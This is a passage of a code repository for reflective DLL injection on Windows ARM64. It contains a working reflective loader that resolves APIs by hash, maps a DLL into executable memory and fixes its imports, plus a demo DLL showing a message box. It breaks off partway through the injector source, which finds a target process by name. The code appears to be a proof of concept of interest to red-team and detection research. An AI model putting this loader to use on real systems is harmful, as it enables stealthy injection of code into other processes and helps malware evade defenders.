├── .gitattributes ├── arm64_reflective_dll_injection.h ├── .gitignore ├── arm64_dll.c ├── arm64_reflective_loader.h ├── arm64_reflective_loader.c ├── arm64_injector.c └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /arm64_reflective_dll_injection.h: -------------------------------------------------------------------------------- 1 | #ifndef ARM64_REFLECTIVE_DLL_INJECTION_H 2 | #define ARM64_REFLECTIVE_DLL_INJECTION_H 3 | 4 | #define WIN32_LEAN_AND_MEAN 5 | #include 6 | 7 | #define DLL_QUERY_HMODULE 6 8 | 9 | typedef ULONG_PTR(WINAPI *REFLECTIVELOADER_FN)(LPVOID); 10 | typedef BOOL(WINAPI *DLLMAIN_FN)(HINSTANCE, DWORD, LPVOID); 11 | 12 | #define DLLEXPORT __declspec(dllexport) 13 | 14 | #endif -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /arm64_dll.c: -------------------------------------------------------------------------------- 1 | #include "arm64_reflective_dll_injection.h" 2 | #include 3 | 4 | HINSTANCE g_hModule = NULL; 5 | 6 | BOOL WINAPI PayloadDllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) 7 | { 8 | switch (dwReason) 9 | { 10 | case DLL_PROCESS_ATTACH: 11 | g_hModule = hinstDLL; 12 | MessageBoxA(NULL, "Reflective DLL Injection on Windows ARM64 - working!", "ARM64 RDI", MB_OK); 13 | break; 14 | case DLL_QUERY_HMODULE: 15 | if (lpReserved != NULL) 16 | { 17 | *(HMODULE *)lpReserved = g_hModule; 18 | } 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } -------------------------------------------------------------------------------- /arm64_reflective_loader.h: -------------------------------------------------------------------------------- 1 | #ifndef ARM64_REFLECTIVE_LOADER_H 2 | #define ARM64_REFLECTIVE_LOADER_H 3 | 4 | #include "arm64_reflective_dll_injection.h" 5 | #include 6 | 7 | typedef HMODULE(WINAPI *LOADLIBRARYA_FN)(LPCSTR); 8 | typedef FARPROC(WINAPI *GETPROCADDRESS_FN)(HMODULE, LPCSTR); 9 | typedef LPVOID(WINAPI *VIRTUALALLOC_FN)(LPVOID, SIZE_T, DWORD, DWORD); 10 | typedef DWORD(NTAPI *NTFLUSHINSTRUCTIONCACHE_FN)(HANDLE, PVOID, ULONG); 11 | 12 | #define KERNEL32DLL_HASH 0x6A4ABC5B 13 | #define NTDLLDLL_HASH 0x3CFA685D 14 | 15 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 16 | #define GETPROCADDRESS_HASH 0x7C0DFCAA 17 | #define VIRTUALALLOC_HASH 0x91AFCA54 18 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 19 | 20 | #define HASH_KEY 13 21 | 22 | #pragma intrinsic(_rotr) 23 | static __forceinline DWORD ror_dword_loader(DWORD d) 24 | { 25 | return _rotr(d, HASH_KEY); 26 | } 27 | 28 | static __forceinline DWORD hash_string_loader(char *c) 29 | { 30 | register DWORD h = 0; 31 | do 32 | { 33 | h = ror_dword_loader(h); 34 | h += *c; 35 | } while (*++c); 36 | return h; 37 | } 38 | 39 | typedef struct _UNICODE_STRING_LDR 40 | { 41 | USHORT Length; 42 | USHORT MaximumLength; 43 | PWSTR Buffer; 44 | } UNICODE_STRING_LDR, *PUNICODE_STRING_LDR; 45 | 46 | typedef struct _PEB_LDR_DATA_LDR 47 | { 48 | ULONG Length; 49 | BOOLEAN Initialized; 50 | HANDLE SsHandle; 51 | LIST_ENTRY InLoadOrderModuleList; 52 | LIST_ENTRY InMemoryOrderModuleList; 53 | LIST_ENTRY InInitializationOrderModuleList; 54 | PVOID EntryInProgress; 55 | BOOLEAN ShutdownInProgress; 56 | HANDLE ShutdownThreadId; 57 | } PEB_LDR_DATA_LDR, *PPEB_LDR_DATA_LDR; 58 | 59 | typedef struct _LDR_DATA_TABLE_ENTRY_LDR 60 | { 61 | LIST_ENTRY InLoadOrderLinks; 62 | LIST_ENTRY InMemoryOrderLinks; 63 | LIST_ENTRY InInitializationOrderLinks; 64 | PVOID DllBase; 65 | PVOID EntryPoint; 66 | ULONG SizeOfImage; 67 | UNICODE_STRING_LDR FullDllName; 68 | UNICODE_STRING_LDR BaseDllName; 69 | ULONG Flags; 70 | USHORT LoadCount; 71 | USHORT TlsIndex; 72 | union 73 | { 74 | LIST_ENTRY HashLinks; 75 | struct 76 | { 77 | PVOID SectionPointer; 78 | ULONG CheckSum; 79 | }; 80 | }; 81 | union 82 | { 83 | ULONG TimeDateStamp; 84 | PVOID LoadedImports; 85 | }; 86 | PVOID EntryPointActivationContext; 87 | PVOID PatchInformation; 88 | LIST_ENTRY ForwarderLinks; 89 | LIST_ENTRY ServiceTagLinks; 90 | LIST_ENTRY StaticLinks; 91 | } LDR_DATA_TABLE_ENTRY_LDR, *PLDR_DATA_TABLE_ENTRY_LDR; 92 | 93 | typedef struct _PEB_LDR 94 | { 95 | BOOLEAN InheritedAddressSpace; 96 | BOOLEAN ReadImageFileExecOptions; 97 | BOOLEAN BeingDebugged; 98 | union 99 | { 100 | BOOLEAN BitField; 101 | struct 102 | { 103 | BOOLEAN ImageUsesLargePages : 1; 104 | BOOLEAN IsProtectedProcess : 1; 105 | BOOLEAN IsImageDynamicallyRelocated : 1; 106 | BOOLEAN SkipPatchingUser32Forwarders : 1; 107 | BOOLEAN IsPackagedProcess : 1; 108 | BOOLEAN IsAppContainer : 1; 109 | BOOLEAN IsProtectedProcessLight : 1; 110 | BOOLEAN IsLongPathAware : 1; 111 | }; 112 | }; 113 | HANDLE Mutant; 114 | PVOID ImageBaseAddress; 115 | PPEB_LDR_DATA_LDR Ldr; 116 | PVOID ProcessParameters; 117 | PVOID SubSystemData; 118 | PVOID ProcessHeap; 119 | PVOID FastPebLock; 120 | PVOID AtlThunkSListPtr; 121 | PVOID IFEOKey; 122 | union 123 | { 124 | ULONG CrossProcessFlags; 125 | struct 126 | { 127 | ULONG ProcessInJob : 1; 128 | ULONG ProcessInitializing : 1; 129 | ULONG ProcessUsingVEH : 1; 130 | ULONG ProcessUsingVCH : 1; 131 | ULONG ProcessUsingFTH : 1; 132 | ULONG ProcessPreviouslyThrottled : 1; 133 | ULONG ProcessCurrentlyThrottled : 1; 134 | ULONG ProcessImagesHotPatched : 1; 135 | ULONG ReservedBits0 : 24; 136 | }; 137 | }; 138 | union 139 | { 140 | PVOID KernelCallbackTable; 141 | PVOID UserSharedInfoPtr; 142 | }; 143 | ULONG SystemReserved; 144 | ULONG AtlThunkSListPtr32; 145 | PVOID ApiSetMap; 146 | ULONG TlsExpansionCounter; 147 | PVOID TlsBitmap; 148 | ULONG TlsBitmapBits[2]; 149 | PVOID ReadOnlySharedMemoryBase; 150 | PVOID SharedData; 151 | PVOID *ReadOnlyStaticServerData; 152 | PVOID AnsiCodePageData; 153 | PVOID OemCodePageData; 154 | PVOID UnicodeCaseTableData; 155 | ULONG NumberOfProcessors; 156 | ULONG NtGlobalFlag; 157 | LARGE_INTEGER CriticalSectionTimeout; 158 | SIZE_T HeapSegmentReserve; 159 | SIZE_T HeapSegmentCommit; 160 | SIZE_T HeapDeCommitTotalFreeThreshold; 161 | SIZE_T HeapDeCommitFreeBlockThreshold; 162 | ULONG NumberOfHeaps; 163 | ULONG MaximumNumberOfHeaps; 164 | PVOID *ProcessHeaps; 165 | PVOID GdiSharedHandleTable; 166 | PVOID ProcessStarterHelper; 167 | ULONG GdiDCAttributeList; 168 | PVOID LoaderLock; 169 | ULONG OSMajorVersion; 170 | ULONG OSMinorVersion; 171 | USHORT OSBuildNumber; 172 | USHORT OSCSDVersion; 173 | ULONG OSPlatformId; 174 | ULONG ImageSubsystem; 175 | ULONG ImageSubsystemMajorVersion; 176 | ULONG ImageSubsystemMinorVersion; 177 | ULONG_PTR ActiveProcessAffinityMask; 178 | ULONG GdiHandleBuffer[60]; 179 | PVOID PostProcessInitRoutine; 180 | PVOID TlsExpansionBitmap; 181 | ULONG TlsExpansionBitmapBits[32]; 182 | ULONG SessionId; 183 | ULARGE_INTEGER AppCompatFlags; 184 | ULARGE_INTEGER AppCompatFlagsUser; 185 | PVOID pShimData; 186 | PVOID AppCompatInfo; 187 | UNICODE_STRING_LDR CSDVersion; 188 | PVOID ActivationContextData; 189 | PVOID ProcessAssemblyStorageMap; 190 | PVOID SystemDefaultActivationContextData; 191 | PVOID SystemAssemblyStorageMap; 192 | SIZE_T MinimumStackCommit; 193 | PVOID SparePointers[2]; 194 | PVOID PatchLoaderData; 195 | PVOID ChpeV2ProcessInfo; 196 | ULONG AppModelFeatureState; 197 | ULONG SpareUlongs[2]; 198 | USHORT ActiveConsoleId; 199 | USHORT AppCompatVersionInfo; 200 | PVOID ExtendedProcessInfo; 201 | } PEB_LDR, *PPEB_LDR; 202 | 203 | typedef struct _IMAGE_RELOC_LDR 204 | { 205 | WORD offset : 12; 206 | WORD type : 4; 207 | } IMAGE_RELOC_LDR, *PIMAGE_RELOC_LDR; 208 | 209 | #endif -------------------------------------------------------------------------------- /arm64_reflective_loader.c: -------------------------------------------------------------------------------- 1 | #include "arm64_reflective_loader.h" 2 | 3 | __declspec(noinline) ULONG_PTR GetIp(VOID) 4 | { 5 | return (ULONG_PTR)_ReturnAddress(); 6 | } 7 | 8 | DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpLoaderParameter) 9 | { 10 | LOADLIBRARYA_FN fnLoadLibraryA = NULL; 11 | GETPROCADDRESS_FN fnGetProcAddress = NULL; 12 | VIRTUALALLOC_FN fnVirtualAlloc = NULL; 13 | NTFLUSHINSTRUCTIONCACHE_FN fnNtFlushInstructionCache = NULL; 14 | 15 | ULONG_PTR uiDllBase; 16 | ULONG_PTR uiPeb; 17 | ULONG_PTR uiKernel32Base = 0; 18 | ULONG_PTR uiNtdllBase = 0; 19 | 20 | uiDllBase = GetIp(); 21 | 22 | while (TRUE) 23 | { 24 | if (((PIMAGE_DOS_HEADER)uiDllBase)->e_magic == IMAGE_DOS_SIGNATURE) 25 | { 26 | ULONG_PTR uiHeader = uiDllBase + ((PIMAGE_DOS_HEADER)uiDllBase)->e_lfanew; 27 | if (((PIMAGE_NT_HEADERS)uiHeader)->Signature == IMAGE_NT_SIGNATURE) 28 | break; 29 | } 30 | uiDllBase--; 31 | } 32 | 33 | uiPeb = __readx18qword(0x60); 34 | PPEB_LDR_DATA_LDR pLdr = ((PPEB_LDR)uiPeb)->Ldr; 35 | PLIST_ENTRY pModuleList = &(pLdr->InMemoryOrderModuleList); 36 | PLIST_ENTRY pCurrentEntry = pModuleList->Flink; 37 | 38 | while (pCurrentEntry != pModuleList) 39 | { 40 | PLDR_DATA_TABLE_ENTRY_LDR pEntry = (PLDR_DATA_TABLE_ENTRY_LDR)CONTAINING_RECORD(pCurrentEntry, LDR_DATA_TABLE_ENTRY_LDR, InMemoryOrderLinks); 41 | if (pEntry->BaseDllName.Length > 0 && pEntry->BaseDllName.Buffer != NULL) 42 | { 43 | DWORD dwModuleHash = 0; 44 | USHORT usCounter = pEntry->BaseDllName.Length; 45 | BYTE *pNameByte = (BYTE *)pEntry->BaseDllName.Buffer; 46 | 47 | do 48 | { 49 | dwModuleHash = ror_dword_loader(dwModuleHash); 50 | if (*pNameByte >= 'a' && *pNameByte <= 'z') 51 | { 52 | dwModuleHash += (*pNameByte - 0x20); 53 | } 54 | else 55 | { 56 | dwModuleHash += *pNameByte; 57 | } 58 | pNameByte++; 59 | } while (--usCounter); 60 | 61 | if (dwModuleHash == KERNEL32DLL_HASH) 62 | { 63 | uiKernel32Base = (ULONG_PTR)pEntry->DllBase; 64 | } 65 | else if (dwModuleHash == NTDLLDLL_HASH) 66 | { 67 | uiNtdllBase = (ULONG_PTR)pEntry->DllBase; 68 | } 69 | } 70 | if (uiKernel32Base && uiNtdllBase) 71 | break; 72 | pCurrentEntry = pCurrentEntry->Flink; 73 | } 74 | 75 | if (!uiKernel32Base || !uiNtdllBase) 76 | return 0; 77 | 78 | PIMAGE_NT_HEADERS pOldNtHeaders = (PIMAGE_NT_HEADERS)(uiDllBase + ((PIMAGE_DOS_HEADER)uiDllBase)->e_lfanew); 79 | ULONG_PTR uiExportDir = uiKernel32Base + ((PIMAGE_NT_HEADERS)(uiKernel32Base + ((PIMAGE_DOS_HEADER)uiKernel32Base)->e_lfanew))->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 80 | PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)uiExportDir; 81 | ULONG_PTR uiAddressOfNames = uiKernel32Base + pExportDirectory->AddressOfNames; 82 | ULONG_PTR uiAddressOfFunctions = uiKernel32Base + pExportDirectory->AddressOfFunctions; 83 | ULONG_PTR uiAddressOfNameOrdinals = uiKernel32Base + pExportDirectory->AddressOfNameOrdinals; 84 | 85 | for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) 86 | { 87 | char *cName = (char *)(uiKernel32Base + ((DWORD *)uiAddressOfNames)[i]); 88 | DWORD dwHashVal = hash_string_loader(cName); 89 | if (dwHashVal == LOADLIBRARYA_HASH) 90 | fnLoadLibraryA = (LOADLIBRARYA_FN)(uiKernel32Base + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 91 | else if (dwHashVal == GETPROCADDRESS_HASH) 92 | fnGetProcAddress = (GETPROCADDRESS_FN)(uiKernel32Base + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 93 | else if (dwHashVal == VIRTUALALLOC_HASH) 94 | fnVirtualAlloc = (VIRTUALALLOC_FN)(uiKernel32Base + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 95 | if (fnLoadLibraryA && fnGetProcAddress && fnVirtualAlloc) 96 | break; 97 | } 98 | 99 | if (!fnLoadLibraryA || !fnGetProcAddress || !fnVirtualAlloc) 100 | return 0; 101 | 102 | uiExportDir = uiNtdllBase + ((PIMAGE_NT_HEADERS)(uiNtdllBase + ((PIMAGE_DOS_HEADER)uiNtdllBase)->e_lfanew))->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 103 | pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)uiExportDir; 104 | uiAddressOfNames = uiNtdllBase + pExportDirectory->AddressOfNames; 105 | uiAddressOfFunctions = uiNtdllBase + pExportDirectory->AddressOfFunctions; 106 | uiAddressOfNameOrdinals = uiNtdllBase + pExportDirectory->AddressOfNameOrdinals; 107 | 108 | for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) 109 | { 110 | char *cName = (char *)(uiNtdllBase + ((DWORD *)uiAddressOfNames)[i]); 111 | if (hash_string_loader(cName) == NTFLUSHINSTRUCTIONCACHE_HASH) 112 | { 113 | fnNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE_FN)(uiNtdllBase + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 114 | break; 115 | } 116 | } 117 | 118 | if (!fnNtFlushInstructionCache) 119 | return 0; 120 | 121 | ULONG_PTR uiNewImageBase = (ULONG_PTR)fnVirtualAlloc(NULL, pOldNtHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 122 | if (!uiNewImageBase) 123 | return 0; 124 | 125 | for (DWORD i = 0; i < pOldNtHeaders->OptionalHeader.SizeOfHeaders; i++) 126 | { 127 | ((BYTE *)uiNewImageBase)[i] = ((BYTE *)uiDllBase)[i]; 128 | } 129 | 130 | PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&pOldNtHeaders->OptionalHeader + pOldNtHeaders->FileHeader.SizeOfOptionalHeader); 131 | for (WORD i = 0; i < pOldNtHeaders->FileHeader.NumberOfSections; i++) 132 | { 133 | for (DWORD j = 0; j < pSectionHeader[i].SizeOfRawData; j++) 134 | { 135 | ((BYTE *)(uiNewImageBase + pSectionHeader[i].VirtualAddress))[j] = ((BYTE *)(uiDllBase + pSectionHeader[i].PointerToRawData))[j]; 136 | } 137 | } 138 | 139 | ULONG_PTR uiDelta = uiNewImageBase - pOldNtHeaders->OptionalHeader.ImageBase; 140 | PIMAGE_DATA_DIRECTORY pRelocationData = &pOldNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; 141 | 142 | if (pRelocationData->Size > 0 && uiDelta != 0) 143 | { 144 | PIMAGE_BASE_RELOCATION pRelocBlock = (PIMAGE_BASE_RELOCATION)(uiNewImageBase + pRelocationData->VirtualAddress); 145 | while (pRelocBlock->VirtualAddress) 146 | { 147 | DWORD dwEntryCount = (pRelocBlock->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC_LDR); 148 | PIMAGE_RELOC_LDR pRelocEntry = (PIMAGE_RELOC_LDR)((ULONG_PTR)pRelocBlock + sizeof(IMAGE_BASE_RELOCATION)); 149 | for (DWORD k = 0; k < dwEntryCount; k++) 150 | { 151 | if (pRelocEntry[k].type == IMAGE_REL_BASED_DIR64) 152 | { 153 | *(ULONG_PTR *)(uiNewImageBase + pRelocBlock->VirtualAddress + pRelocEntry[k].offset) += uiDelta; 154 | } 155 | } 156 | pRelocBlock = (PIMAGE_BASE_RELOCATION)((ULONG_PTR)pRelocBlock + pRelocBlock->SizeOfBlock); 157 | } 158 | } 159 | 160 | PIMAGE_DATA_DIRECTORY pImportData = &pOldNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; 161 | if (pImportData->Size > 0) 162 | { 163 | PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)(uiNewImageBase + pImportData->VirtualAddress); 164 | while (pImportDesc->Name) 165 | { 166 | char *sModuleName = (char *)(uiNewImageBase + pImportDesc->Name); 167 | HINSTANCE hModule = fnLoadLibraryA(sModuleName); 168 | if (hModule) 169 | { 170 | PIMAGE_THUNK_DATA pOriginalFirstThunk = (PIMAGE_THUNK_DATA)(uiNewImageBase + pImportDesc->OriginalFirstThunk); 171 | PIMAGE_THUNK_DATA pFirstThunk = (PIMAGE_THUNK_DATA)(uiNewImageBase + pImportDesc->FirstThunk); 172 | if (!pOriginalFirstThunk) 173 | pOriginalFirstThunk = pFirstThunk; 174 | 175 | while (pOriginalFirstThunk->u1.AddressOfData) 176 | { 177 | FARPROC pfnImportedFunc; 178 | if (IMAGE_SNAP_BY_ORDINAL(pOriginalFirstThunk->u1.Ordinal)) 179 | { 180 | pfnImportedFunc = fnGetProcAddress(hModule, (LPCSTR)(pOriginalFirstThunk->u1.Ordinal & 0xFFFF)); 181 | } 182 | else 183 | { 184 | PIMAGE_IMPORT_BY_NAME pImportByName = (PIMAGE_IMPORT_BY_NAME)(uiNewImageBase + pOriginalFirstThunk->u1.AddressOfData); 185 | pfnImportedFunc = fnGetProcAddress(hModule, pImportByName->Name); 186 | } 187 | pFirstThunk->u1.Function = (ULONG_PTR)pfnImportedFunc; 188 | pOriginalFirstThunk++; 189 | pFirstThunk++; 190 | } 191 | } 192 | pImportDesc++; 193 | } 194 | } 195 | 196 | DLLMAIN_FN fnDllEntry = (DLLMAIN_FN)(uiNewImageBase + pOldNtHeaders->OptionalHeader.AddressOfEntryPoint); 197 | fnNtFlushInstructionCache((HANDLE)-1, NULL, 0); 198 | fnDllEntry((HINSTANCE)uiNewImageBase, DLL_PROCESS_ATTACH, lpLoaderParameter); 199 | 200 | return uiNewImageBase; 201 | } -------------------------------------------------------------------------------- /arm64_injector.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "arm64_reflective_dll_injection.h" 8 | 9 | #ifndef IMAGE_FILE_MACHINE_ARM64 10 | #define IMAGE_FILE_MACHINE_ARM64 0xAA64 11 | #endif 12 | 13 | void DisplayBanner() 14 | { 15 | HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE); 16 | CONSOLE_SCREEN_BUFFER_INFO consoleInfo; 17 | WORD saved_attributes; 18 | 19 | GetConsoleScreenBufferInfo(hConsole, &consoleInfo); 20 | saved_attributes = consoleInfo.wAttributes; 21 | 22 | SetConsoleTextAttribute(hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_INTENSITY); 23 | 24 | printf("=====================================================================\n"); 25 | printf("| Reflective DLL Injection on Windows ARM64 |\n"); 26 | printf("| By @xaitax |\n"); 27 | printf("=====================================================================\n\n"); 28 | 29 | SetConsoleTextAttribute(hConsole, saved_attributes); 30 | } 31 | 32 | BOOL IsHostARM64() 33 | { 34 | SYSTEM_INFO sysInfo; 35 | GetNativeSystemInfo(&sysInfo); 36 | return sysInfo.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_ARM64; 37 | } 38 | 39 | void PrintWindowsVersion() 40 | { 41 | OSVERSIONINFOEXW osvi; 42 | typedef NTSTATUS(WINAPI * RTL_GET_VERSION_PROC)(LPOSVERSIONINFOEXW); 43 | RTL_GET_VERSION_PROC RtlGetVersionFunc = NULL; 44 | 45 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 46 | char szOsDisplayName[128]; 47 | char szOsMarketingName[32] = "Windows"; 48 | 49 | if (hNtdll) 50 | { 51 | RtlGetVersionFunc = (RTL_GET_VERSION_PROC)GetProcAddress(hNtdll, "RtlGetVersion"); 52 | if (RtlGetVersionFunc) 53 | { 54 | ZeroMemory(&osvi, sizeof(OSVERSIONINFOEXW)); 55 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW); 56 | if (RtlGetVersionFunc(&osvi) == 0) 57 | { 58 | 59 | if (osvi.dwMajorVersion == 10 && osvi.dwMinorVersion == 0 && osvi.dwBuildNumber >= 22000) 60 | { 61 | strcpy_s(szOsMarketingName, sizeof(szOsMarketingName), "Windows 11"); 62 | } 63 | else if (osvi.dwMajorVersion == 10 && osvi.dwMinorVersion == 0) 64 | { 65 | strcpy_s(szOsMarketingName, sizeof(szOsMarketingName), "Windows 10"); 66 | } 67 | sprintf_s(szOsDisplayName, sizeof(szOsDisplayName), "%s (Build %lu)", 68 | szOsMarketingName, 69 | osvi.dwBuildNumber); 70 | printf(" Host OS: %s\n", szOsDisplayName); 71 | return; 72 | } 73 | } 74 | } 75 | printf(" Host OS: Unable to determine Windows version.\n"); 76 | } 77 | 78 | DWORD GetProcessIdByName(const char *processName) 79 | { 80 | PROCESSENTRY32 entry; 81 | entry.dwSize = sizeof(PROCESSENTRY32); 82 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 83 | DWORD pid = 0; 84 | 85 | if (snapshot == INVALID_HANDLE_VALUE) 86 | { 87 | printf(" CreateToolhelp32Snapshot failed. Error: %lu\n", GetLastError()); 88 | return 0; 89 | } 90 | 91 | if (Process32First(snapshot, &entry) == TRUE) 92 | { 93 | while (Process32Next(snapshot, &entry) == TRUE) 94 | { 95 | if (_stricmp(entry.szExeFile, processName) == 0) 96 | { 97 | pid = entry.th32ProcessID; 98 | break; 99 | } 100 | } 101 | } 102 | else 103 | { 104 | printf(" Process32First failed. Error: %lu\n", GetLastError()); 105 | } 106 | 107 | CloseHandle(snapshot); 108 | return pid; 109 | } 110 | 111 | DWORD RvaToOffset_Injector(DWORD dwRva, PIMAGE_NT_HEADERS pNtHeaders, LPVOID lpFileBase) 112 | { 113 | PIMAGE_SECTION_HEADER pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders); 114 | 115 | if (pNtHeaders->FileHeader.NumberOfSections == 0) 116 | { 117 | if (dwRva < pNtHeaders->OptionalHeader.SizeOfHeaders) 118 | { 119 | return dwRva; 120 | } 121 | else 122 | { 123 | return 0; 124 | } 125 | } 126 | 127 | if (dwRva < pSectionHeader[0].VirtualAddress) 128 | { 129 | if (dwRva < pNtHeaders->OptionalHeader.SizeOfHeaders) 130 | { 131 | return dwRva; 132 | } 133 | else 134 | { 135 | return 0; 136 | } 137 | } 138 | 139 | for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++) 140 | { 141 | if (dwRva >= pSectionHeader[i].VirtualAddress && 142 | dwRva < (pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)) 143 | { 144 | return (pSectionHeader[i].PointerToRawData + (dwRva - pSectionHeader[i].VirtualAddress)); 145 | } 146 | } 147 | return 0; 148 | } 149 | 150 | DWORD GetReflectiveLoaderOffset(LPVOID lpFileBuffer) 151 | { 152 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpFileBuffer; 153 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) 154 | { 155 | printf(" Invalid DOS signature.\n"); 156 | return 0; 157 | } 158 | PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)lpFileBuffer + pDosHeader->e_lfanew); 159 | if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE) 160 | { 161 | printf(" Invalid NT signature.\n"); 162 | return 0; 163 | } 164 | if (pNtHeaders->FileHeader.Machine != IMAGE_FILE_MACHINE_ARM64) 165 | { 166 | printf(" DLL is not ARM64. Machine: 0x%hX\n", pNtHeaders->FileHeader.Machine); 167 | return 0; 168 | } 169 | if (pNtHeaders->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) 170 | { 171 | printf(" DLL is not PE32+.\n"); 172 | return 0; 173 | } 174 | 175 | PIMAGE_DATA_DIRECTORY pExportDataDir = &pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 176 | if (pExportDataDir->VirtualAddress == 0 || pExportDataDir->Size == 0) 177 | { 178 | printf(" No export directory found.\n"); 179 | return 0; 180 | } 181 | 182 | DWORD exportDirFileOffset = RvaToOffset_Injector(pExportDataDir->VirtualAddress, pNtHeaders, lpFileBuffer); 183 | if (exportDirFileOffset == 0 && pExportDataDir->VirtualAddress != 0) 184 | { 185 | printf(" Could not convert export directory RVA 0x%lX to offset.\n", pExportDataDir->VirtualAddress); 186 | return 0; 187 | } 188 | 189 | PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)lpFileBuffer + exportDirFileOffset); 190 | 191 | if (pExportDir->AddressOfNames == 0 || pExportDir->AddressOfNameOrdinals == 0 || pExportDir->AddressOfFunctions == 0) 192 | { 193 | printf(" Export directory contains null RVA(s) for names, ordinals, or functions.\n"); 194 | return 0; 195 | } 196 | 197 | DWORD namesOffset = RvaToOffset_Injector(pExportDir->AddressOfNames, pNtHeaders, lpFileBuffer); 198 | DWORD ordinalsOffset = RvaToOffset_Injector(pExportDir->AddressOfNameOrdinals, pNtHeaders, lpFileBuffer); 199 | DWORD functionsOffset = RvaToOffset_Injector(pExportDir->AddressOfFunctions, pNtHeaders, lpFileBuffer); 200 | 201 | if (namesOffset == 0 && pExportDir->AddressOfNames != 0) 202 | { 203 | printf(" Failed to convert AddressOfNames RVA (0x%lX) to offset.\n", pExportDir->AddressOfNames); 204 | return 0; 205 | } 206 | if (ordinalsOffset == 0 && pExportDir->AddressOfNameOrdinals != 0) 207 | { 208 | printf(" Failed to convert AddressOfNameOrdinals RVA (0x%lX) to offset.\n", pExportDir->AddressOfNameOrdinals); 209 | return 0; 210 | } 211 | if (functionsOffset == 0 && pExportDir->AddressOfFunctions != 0) 212 | { 213 | printf(" Failed to convert AddressOfFunctions RVA (0x%lX) to offset.\n", pExportDir->AddressOfFunctions); 214 | return 0; 215 | } 216 | 217 | DWORD *pNamesRva = (DWORD *)((ULONG_PTR)lpFileBuffer + namesOffset); 218 | WORD *pOrdinals = (WORD *)((ULONG_PTR)lpFileBuffer + ordinalsOffset); 219 | DWORD *pAddressesRva = (DWORD *)((ULONG_PTR)lpFileBuffer + functionsOffset); 220 | 221 | for (DWORD i = 0; i < pExportDir->NumberOfNames; i++) 222 | { 223 | if (pNamesRva[i] == 0) 224 | continue; 225 | DWORD funcNameFileOffset = RvaToOffset_Injector(pNamesRva[i], pNtHeaders, lpFileBuffer); 226 | if (funcNameFileOffset == 0 && pNamesRva[i] != 0) 227 | { 228 | printf(" Failed to convert function name RVA (0x%lX) for index %lu to offset.\n", pNamesRva[i], i); 229 | continue; 230 | } 231 | char *funcName = (char *)((ULONG_PTR)lpFileBuffer + funcNameFileOffset); 232 | 233 | if (strcmp(funcName, "ReflectiveLoader") == 0) 234 | { 235 | if 